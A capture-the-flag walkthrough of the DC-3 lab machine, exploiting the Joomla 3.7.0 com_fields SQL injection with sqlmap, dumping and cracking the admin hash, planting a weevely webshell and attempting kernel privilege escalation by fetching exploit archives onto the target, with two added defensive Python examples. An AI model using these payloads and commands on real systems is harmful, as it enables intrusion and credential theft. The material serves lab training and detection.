
DCchallenges3

  • Environment

Subnet 192.168.18.0/24

Kali 192.168.18.131

Target 192.168.18.134

Scan the subnet with nmap

kali@kali2020:~$ sudo nmap 192.168.18.0/24 -sn
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-01 11:09 CST
Nmap scan report for 192.168.18.2
Host is up (0.00010s latency).
MAC Address: 00:50:56:E0:DA:9A (VMware)
Nmap scan report for 192.168.18.134
Host is up (0.00055s latency).
MAC Address: 00:0C:29:83:96:86 (VMware)
Nmap scan report for 192.168.18.254
Host is up (0.00033s latency).
MAC Address: 00:50:56:E1:37:77 (VMware)
Nmap scan report for 192.168.18.131
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.01 seconds

Scan the target's open ports

kali@kali2020:~$ sudo nmap 192.168.18.134 -p- -sV
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-01 11:11 CST
Nmap scan report for 192.168.18.134
Host is up (0.0014s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 00:0C:29:83:96:86 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.22 seconds

Only port 80 is open.

Scan directories with dirsearch

kali@kali2020:~/Tools/dirsearch$ sudo python3 dirsearch.py -u 192.168.18.134:80


The scan finds the administrator login page:

http://192.168.18.134/administrator/

The home page carries a note:

Welcome to DC-3.

This time, there is only one flag, one entry point and no clues.

To get the flag, you'll obviously have to gain root privileges.

How you get to be root is up to you - and, obviously, the system.

Good luck - and I hope you enjoy this little challenge. :-)

This time there is only one flag, and getting it requires root privileges.

Visiting the administrator page shows the site runs on Joomla.

A web search turns up JoomScan; install it with sudo git clone https://github.com/rezasp/joomscan.git

perl joomscan.pl -u 192.168.18.134

[+] FireWall Detector
[++] Firewall not detected

[+] Detecting Joomla Version
[++] Joomla 3.7.0

[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable

[+] Checking Directory Listing
[++] directory has directory listing :
http://192.168.18.134/administrator/components
http://192.168.18.134/administrator/modules
http://192.168.18.134/administrator/templates
http://192.168.18.134/images/banners

[+] Checking apache info/status files
[++] Readable info/status files are not found

[+] admin finder
[++] Admin page : http://192.168.18.134/administrator/

[+] Checking robots.txt existing
[++] robots.txt is not found

[+] Finding common backup files name
[++] Backup files are not found

[+] Finding common log files name
[++] error log is not found

[+] Checking sensitive config.php.x file
[++] Readable config files are not found

Your Report : reports/192.168.18.134/

JoomScan reports Joomla version 3.7.0.

Searching for vulnerabilities in this version turns up a SQL injection.


kali@kali2020:~/Tools$ sudo searchsploit joomla 3.7.0

Exploit Title | Path
Joomla! 3.7.0 - 'com_fields' SQL Injection | php/webapps/42033.txt
Joomla! Component Easydiscuss < 4.0.21 - Cross-Site Scripti | php/webapps/43488.txt

Shellcodes: No Results

cat /usr/share/exploitdb/exploits/php/webapps/42033.txt

#Exploit Title: Joomla 3.7.0 - Sql Injection

#Date: 05-19-2017

#Exploit Author: Mateus Lino

#Reference: https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html

#Vendor Homepage: https://www.joomla.org/

#Version: = 3.7.0

#Tested on: Win, Kali Linux x64, Ubuntu, Manjaro and Arch Linux

#CVE : - CVE-2017-8917

URL Vulnerable: http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27

Using Sqlmap:

sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

Parameter: list[fullordering] (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (DUAL)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(CASE WHEN (1573=1573) THEN 1573 ELSE 1573*(SELECT 1573 FROM DUAL UNION SELECT 9674 FROM DUAL) END)

Type: error-based
Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 6600 FROM(SELECT COUNT(*),CONCAT(0x7171767071,(SELECT (ELT(6600=6600,1))),0x716a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT * FROM (SEL


It gives the vulnerable URL:

http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27

sqlmap command for the injection:

sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

The injection types present:

Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (DUAL)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(CASE WHEN (1573=1573) THEN 1573 ELSE 1573*(SELECT 1573 FROM DUAL UNION SELECT 9674 FROM DUAL) END)
Type: error-based
Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 6600 FROM(SELECT COUNT(*),CONCAT(0x7171767071,(SELECT (ELT(6600=6600,1))),0x716a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT * FROM (SEL
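The com_fields injection works because Joomla 3.7.0 passed list[fullordering] into the ORDER BY clause without validating it. As an added example (not code from this page, from Joomla or from sqlmap), the Python below shows the two defensive halves: the standard mitigation for ORDER BY injection, an allowlist of column names and directions from which the clause is assembled so that no request bytes reach the SQL text, and a detector that flags com_fields requests in Apache access logs whose ordering value carries SQL syntax. The access-log lines, the table, its rows, the allowlist and the sqlmap user agent are constructed for the demo.

```python
import re
import sqlite3
from urllib.parse import urlparse, parse_qs

# Constructed Apache combined-log lines (not captured from the page's target).
SAMPLE_LOG = """\
192.168.18.131 - - [01/May/2021:11:30:02 +0800] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=a.name%20ASC HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.18.131 - - [01/May/2021:11:31:10 +0800] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27 HTTP/1.1" 500 312 "-" "sqlmap/1.5"
192.168.18.131 - - [01/May/2021:11:31:11 +0800] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=(CASE%20WHEN%20(1573=1573)%20THEN%201573%20ELSE%201573*(SELECT%201573%20FROM%20DUAL%20UNION%20SELECT%209674%20FROM%20DUAL)%20END) HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.18.131 - - [01/May/2021:11:32:00 +0800] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 8800 "-" "Mozilla/5.0"
"""

# --- Hardened side: the ORDER BY clause is built only from allowlisted literals ---
ALLOWED_ORDERING = {"a.id", "a.title", "a.name"}   # constructed allowlist for the demo table
DEFAULT_ORDERING = "a.id ASC"

def safe_order_clause(fullordering: str, default: str = DEFAULT_ORDERING) -> str:
    """Accept only '<allowlisted column> ASC|DESC'; anything else falls back to the default.
    The returned string is assembled from vetted literals, never from the request value itself."""
    parts = fullordering.strip().split()
    if len(parts) != 2:
        return default
    column, direction = parts[0], parts[1].upper()
    if column not in ALLOWED_ORDERING or direction not in ("ASC", "DESC"):
        return default
    return f"{column} {direction}"

def build_demo_db() -> sqlite3.Connection:
    """In-memory stand-in for the fields table (constructed rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE fields (id INTEGER, title TEXT, name TEXT)")
    conn.executemany("INSERT INTO fields VALUES (?, ?, ?)",
                     [(1, "zeta", "z"), (2, "alpha", "a"), (3, "mid", "m")])
    return conn

def fetch_field_titles(conn: sqlite3.Connection, fullordering: str) -> list:
    """Same call shape as the vulnerable code (ORDER BY driven by a request parameter),
    but only the sanitized clause is interpolated into the query text."""
    order = safe_order_clause(fullordering)
    rows = conn.execute(f"SELECT a.title FROM fields AS a ORDER BY {order}").fetchall()
    return [row[0] for row in rows]

# --- Detection side: flag com_fields requests whose ordering value carries SQL syntax ---
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
SQL_MARKERS = re.compile(
    r"updatexml|extractvalue|\bselect\b|\bunion\b|\bcase\b|\bsleep\b|\bbenchmark\b|[()'\"]",
    re.IGNORECASE)

def scan_access_log(text: str) -> list:
    """Return (ip, timestamp, status, decoded ordering value) for each suspicious com_fields request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = parse_qs(urlparse(m["path"]).query)   # parse_qs percent-decodes the values
        if query.get("option") != ["com_fields"]:
            continue
        for value in query.get("list[fullordering]", []):
            if SQL_MARKERS.search(value):
                findings.append((m["ip"], m["ts"], m["status"], value))
    return findings

if __name__ == "__main__":
    db = build_demo_db()
    print(fetch_field_titles(db, "a.title DESC"))   # allowlisted: honoured
    print(fetch_field_titles(db, "updatexml'"))     # rejected: default ordering used
    for hit in scan_access_log(SAMPLE_LOG):
        print("suspicious com_fields ordering:", hit)
```

The detector deliberately keys on SQL syntax rather than on a 500 status: the boolean-blind and time-based payloads in the exploit text return 200, so an error-only rule would miss most of a sqlmap run. A legitimate but unlisted column name only falls back to the default ordering in the sanitizer and is not reported by the detector, which keeps false positives low.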

sqlmap -u "http://192.168.18.134/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --random-agent --batch --dbs -p list[fullordering]

Databases found:

available databases [5]:
[*] information_schema
[*] joomladb
[*] mysql
[*] performance_schema
[*] sys

List the table names:

sqlmap -u "http://192.168.18.134/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --random-agent --batch -D joomladb --tables -p list[fullordering]

Database: joomladb
[76 tables]
+---------------------+
| #__assets           |
| #__associations     |
| #__banner_clients   |
| #__banner_tracks    |
| #__banners          |
| #__bsms_admin       |
| #__bsms_books       |
| #__bsms_comments    |
| #__bsms_locations   |
| #__bsms_mediafiles  |
| #__bsms_message_typ |
| #__bsms_podcast     |
| #__bsms_series      |
| #__bsms_servers     |
| #__bsms_studies     |
| #__bsms_studytopics |
| #__bsms_teachers    |
| #__bsms_templatecod |
| #__bsms_templates   |
| #__bsms_timeset     |
| #__bsms_topics      |
| #__bsms_update      |
| #__categories       |
| #__contact_details  |
| #__content_frontpag |
| #__content_rating   |
| #__content_types    |
| #__content          |
| #__contentitem_tag_ |
| #__core_log_searche |
| #__extensions       |
| #__fields_categorie |
| #__fields_groups    |
| #__fields_values    |
| #__fields           |
| #__finder_filters   |
| #__finder_links_ter |
| #__finder_links     |
| #__finder_taxonomy_ |
| #__finder_taxonomy  |
| #__finder_terms_com |
| #__finder_terms     |
| #__finder_tokens_ag |
| #__finder_tokens    |
| #__finder_types     |
| #__jbsbackup_timese |
| #__jbspodcast_times |
| #__languages        |
| #__menu_types       |
| #__menu             |
| #__messages_cfg     |
| #__messages         |
| #__modules_menu     |
| #__modules          |
| #__newsfeeds        |
| #__overrider        |
| #__postinstall_mess |
| #__redirect_links   |
| #__schemas          |
| #__session          |
| #__tags             |
| #__template_styles  |
| #__ucm_base         |
| #__ucm_content      |
| #__ucm_history      |
| #__update_sites_ext |
| #__update_sites     |
| #__updates          |
| #__user_keys        |
| #__user_notes       |
| #__user_profiles    |
| #__user_usergroup_m |
| #__usergroups       |
| #__users            |
| #__utf8_conversion  |
| #__viewlevels       |
+---------------------+

List the columns:

sqlmap -u "http://192.168.18.134/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --random-agent -p list[fullordering] -D "joomladb" -T "#__users" --columns

Database: joomladb
Table: #__users
[6 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| email    | non-numeric |
| id       | numeric     |
| name     | non-numeric |
| params   | non-numeric |
| password | non-numeric |
| username | non-numeric |
+----------+-------------+


sqlmap -u "http://192.168.18.134/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" -C "username,password" --dump -p list[fullordering]

Database: joomladb
Table: #__users
[1 entry]
+----------+--------------------------------------------------------------+
| username | password                                                     |
+----------+--------------------------------------------------------------+
| admin    | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu |
+----------+--------------------------------------------------------------+


Save the hash to a file and crack it with John.


vim dc3password_hash.txt

kali@kali2020:~/Tools$ cat dc3password_hash.txt
$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu
kali@kali2020:~/Tools$ sudo john dc3password_hash.txt -show
?:snoopy

The password is snoopy.

Log into the backend as admin/snoopy: login succeeds.

Look for a place to upload a shell.

Use weevely, which ships with Kali (a webshell management tool).

kali@kali2020:~$ weevely generate pass shell.php

Generated 'shell.php' with password 'pass' of 761 byte size.

kali@kali2020:~$ cat shell.php

After uploading shell.php, connect to it.

kali@kali2020:~$ weevely http://192.168.18.134/templates/beez3/shell.php pass

[+] weevely 4.0.1

[+] Target: 192.168.18.134
[+] Session: /home/kali/.weevely/sessions/192.168.18.134/shell_1.session

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

weevely> shell
sh: 1: shell: not found
www-data@DC-3:/var/www/html/templates/beez3 $ whoami
www-data
www-data@DC-3:/var/www/html/templates/beez3 $
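The foothold above is a PHP file dropped into templates/beez3 and driven through weevely, which is exactly what a file-integrity baseline of the web root catches. As an added example, not code from this page, from Joomla or from weevely, the Python below hashes every PHP file of a known-good tree, then on a rescan reports files that are new, that differ from the baseline, or that contain source markers typical of obfuscated shells. The directory layout, the two template files and the file planted as shell.php are all constructed; the planted sample only carries the textual markers (its base64 literal decodes to a PHP comment) and is not weevely output.

```python
import hashlib
import os
import re
import tempfile

# Source-level markers common to PHP webshells (a hit is a reason to look, not proof on its own).
INDICATORS = {
    "eval": re.compile(r"\beval\s*\(", re.I),
    "base64_decode": re.compile(r"\bbase64_decode\s*\(", re.I),
    "str_rot13": re.compile(r"\bstr_rot13\s*\(", re.I),
    "dynamic_call": re.compile(r"\$\w+\s*\(\s*\$"),            # $f($x): callee name held in a variable
    "request_input": re.compile(r"\$_(POST|GET|COOKIE|REQUEST)\b"),
    "long_blob": re.compile(r"['\"][A-Za-z0-9+/=]{80,}['\"]"),  # long base64-looking literal
}

def sha256_file(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def php_files(root: str):
    """Yield (relative path, absolute path) for every .php file under root."""
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".php"):
                full = os.path.join(dirpath, name)
                yield os.path.relpath(full, root).replace(os.sep, "/"), full

def build_baseline(root: str) -> dict:
    """Hash every PHP file of a known-good deployment; record this at install or upgrade time."""
    return {rel: sha256_file(full) for rel, full in php_files(root)}

def scan_tree(root: str, baseline: dict) -> list:
    """Report PHP files that are absent from the baseline, differ from it, or carry shell markers."""
    findings = []
    for rel, full in php_files(root):
        with open(full, encoding="utf-8", errors="replace") as fh:
            source = fh.read()
        hits = [name for name, rx in INDICATORS.items() if rx.search(source)]
        if rel not in baseline:
            status = "unknown"
        elif baseline[rel] != sha256_file(full):
            status = "modified"
        else:
            status = "ok"
        if status != "ok" or hits:
            findings.append({"path": rel, "status": status, "indicators": hits})
    return sorted(findings, key=lambda f: f["path"])

def _write(root: str, rel: str, text: str) -> None:
    full = os.path.join(root, rel)
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "w", encoding="utf-8") as fh:
        fh.write(text)

# Constructed, inert sample: it has the textual shape of an obfuscated shell, but the
# base64 literal decodes to the PHP comment "// constructed sample", so it does nothing.
INERT_SAMPLE = (
    "<?php\n"
    "$p = $_POST['pass'] ?? '';\n"
    "if ($p === 'pass') { @eval(base64_decode('Ly8gY29uc3RydWN0ZWQgc2FtcGxl')); }\n"
)

def demo() -> list:
    """Build a tiny Joomla-like tree, baseline it, then plant one file, tamper another, rescan."""
    root = tempfile.mkdtemp(prefix="joomla-demo-")
    _write(root, "templates/beez3/index.php", "<?php defined('_JEXEC') or die; echo 'beez3'; ?>\n")
    _write(root, "templates/beez3/error.php", "<?php defined('_JEXEC') or die; echo 'error'; ?>\n")
    baseline = build_baseline(root)
    _write(root, "templates/beez3/shell.php", INERT_SAMPLE)                                           # new file
    _write(root, "templates/beez3/error.php", "<?php defined('_JEXEC') or die; echo 'err0r'; ?>\n")  # tampered
    return scan_tree(root, baseline)

if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

The two checks are complementary: the hash comparison catches the tampered error.php, which contains no suspicious function at all, while the marker scan explains why shell.php deserves attention beyond merely being new. In practice the baseline belongs off the web server (the attacker runs as www-data here and could edit a baseline stored next to the site), and the scan is paired with alerting on any write under templates/ or images/ by the web server user.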


Now find a way to escalate privileges.

Check the target's version: Ubuntu 16.04 with kernel 4.4.0-21.

www-data@DC-3:/var/www/html $ uname -a
Linux DC-3 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
www-data@DC-3:/var/www/html $ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 16.04 LTS
Release:        16.04
Codename:       xenial

Search the exploit database.

kali@kali2020:~/Tools$ searchsploit -w ubuntu 16.04 4.4.0-21

Exploit Title | URL
Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free | https://www.exploit-db.com/exploits/43234
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter 'target_offset' Out-of-B | https://www.exploit-db.com/exploits/40049
Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x64) - 'AF_PACKET' Race | https://www.exploit-db.com/exploits/47170
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation | https://www.exploit-db.com/exploits/45010
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation | https://www.exploit-db.com/exploits/44298
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local | https://www.exploit-db.com/exploits/44300
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege E | https://www.exploit-db.com/exploits/43418
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) | https://www.exploit-db.com/exploits/47169
Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via User Namespace Privilege E | https://www.exploit-db.com/exploits/41760

Shellcodes: No Results



www-data@DC-3:/var/www $ wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
--2021-05-01 23:52:54--  https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
Resolving github.com (github.com)... 13.250.177.223
Connecting to github.com (github.com)|13.250.177.223|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/39772.zip [following]
--2021-05-01 23:52:55--  https://raw.githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/39772.zip
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... ::1, 127.0.0.1
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|::1|:443... failed: Connection refused.
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|127.0.0.1|:443... failed: Connection refused.
www-data@DC-3:/var/www $ ls
html
www-data@DC-3:/var/www $ wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
--2021-05-01 23:53:39--  https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
Resolving github.com (github.com)... 13.250.177.223
Connecting to github.com (github.com)|13.250.177.223|:443... connected.
HTTP request sent, awaiting response... No data received.
Retrying.

--2021-05-01 23:53:56--  (try: 2)  https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
Connecting to github.com (github.com)|13.250.177.223|:443... failed: Connection refused.
Resolving github.com (github.com)... 13.229.188.59
Connecting to github.com (github.com)|13.229.188.59|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/39772.zip [following]
--2021-05-01 23:54:18--  https://raw.githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/39772.zip
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... ::1, 127.0.0.1
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|::1|:443... failed: Connection refused.
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|127.0.0.1|:443... failed: Connection refused.

The download timed out. Next attempt: download on Kali first and have the target fetch the file from Kali. The VM's proxy has stopped working recently and is still being investigated...







Summary

  • nmap scan of the subnet and of the target's open ports

  • dirsearch directory scan

  • Information gathering (Joomla)

  • JoomScan version scan

  • searchsploit lookup of Joomla vulnerabilities

  • sqlmap dump of the backend account and password (the password is hashed)

  • john to crack the hash

  • Log into the backend and find a place to upload a shell

  • Generate a one-line webshell with weevely: weevely generate <password> b.php

  • Connect with weevely: weevely <URL> <password>

weevely usage (webshell): https://blog.csdn.net/qq_26090065/article/details/81235120

  • Privilege escalation (not completed)
